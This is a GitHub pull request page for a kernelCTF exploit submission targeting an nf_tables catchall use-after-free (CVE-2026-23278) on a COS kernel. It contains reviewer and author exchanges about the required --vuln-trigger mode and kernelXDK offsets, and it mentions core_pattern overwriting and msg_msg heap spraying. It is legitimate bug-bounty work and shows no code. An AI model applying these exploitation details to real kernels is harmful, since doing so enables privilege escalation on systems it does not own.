Skip to content

Add kernelCTF CVE-2026-23278_cos (#exp462)#374

Open
G0RiyA wants to merge 6 commits into
google:masterfrom
G0RiyA:kernelctf-CVE-2026-23278
Open

Add kernelCTF CVE-2026-23278_cos (#exp462)#374
G0RiyA wants to merge 6 commits into
google:masterfrom
G0RiyA:kernelctf-CVE-2026-23278

Conversation

@G0RiyA
Copy link
Copy Markdown

@G0RiyA G0RiyA commented Apr 30, 2026
edited
Loading

kernelCTF submission for CVE-2026-23278 (nf_tables catchall break-statement UAF).

Submission ID: exp462

Target: cos-121-18867.381.30

Note: vuln-verify CI fails because the fix commit (7cb9a23d7ae4) has not been backported to the 6.6 stable branch yet. It exists in v7.0-rc4 and was backported to v6.12.78+, but not to 6.6.x which COS-121-18867.381.30 is based on.

@google-cla
Copy link
Copy Markdown

google-cla Bot commented Apr 30, 2026

Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA).

View this failed invocation of the CLA check for more information.

For the most up to date status, view the checks section at the bottom of the pull request.

@G0RiyA G0RiyA force-pushed the kernelctf-CVE-2026-23278 branch from 04f598b to b702377 Compare April 30, 2026 00:16
G0RiyA added 2 commits May 9, 2026 22:46
@G0RiyA
Use kernelXDK AddSymbol/AddStruct for missing offsets
373a955 
Replace hardcoded CORE_PATTERN_PHYS and struct unix_address_user /
BIND_LEN with per-target kernelXDK definitions using AddSymbol and
AddStruct, following the recommended pattern from the libxdk sample
exploit documentation.

Update exploit.md line references and code blocks to match.
@G0RiyA
Trigger immediate poweroff after flag output for faster test runs
0e813fe
@matrizzo matrizzo self-assigned this May 21, 2026
@matrizzo matrizzo added the recheck Triggers kernelCTF PR verification again label May 27, 2026
@matrizzo
Copy link
Copy Markdown
Collaborator

matrizzo commented May 27, 2026

Hi, thanks for your submission.

This exploit needs to support the --vuln-trigger flag (https://google.github.io/security-research/kernelctf/rules.html#exploit). This should only trigger the bug on a KASAN kernel and nothing more (see the rules in the link). In addition to that it should get the size of msg_msg from kernelXDK

G0RiyA added 3 commits May 28, 2026 03:39
@G0RiyA
Add --vuln-trigger flag for KASAN vulnerability verification
5f8550b 
Implement the required --vuln-trigger mode that triggers the
nft_map_catchall break-statement bug and causes a UAF write
detectable by KASAN, without running the full exploit chain.
@G0RiyA
Reorder vuln-trigger before core_pattern reentry and add recv timeout
80ab6c9
@G0RiyA
Update exploit.md line references for reordered exploit.cpp
1327ea6
@G0RiyA
Copy link
Copy Markdown
Author

G0RiyA commented May 27, 2026

Added --vuln-trigger support in the latest commits. It triggers the nft_map_catchall break-statement bug and causes a UAF write detectable by KASAN, without running the full exploit chain.

Regarding msg_msg size: MSG_MSG_SIZE (0x80) is the total allocation size used for heap spray targeting kmalloc-cg-128. The actual msg_msg header size is obtained from kernelXDK via target.GetStructSize("msg_msg") at line 698.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

@matrizzo matrizzo

Labels

recheck Triggers kernelCTF PR verification again

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@G0RiyA @matrizzo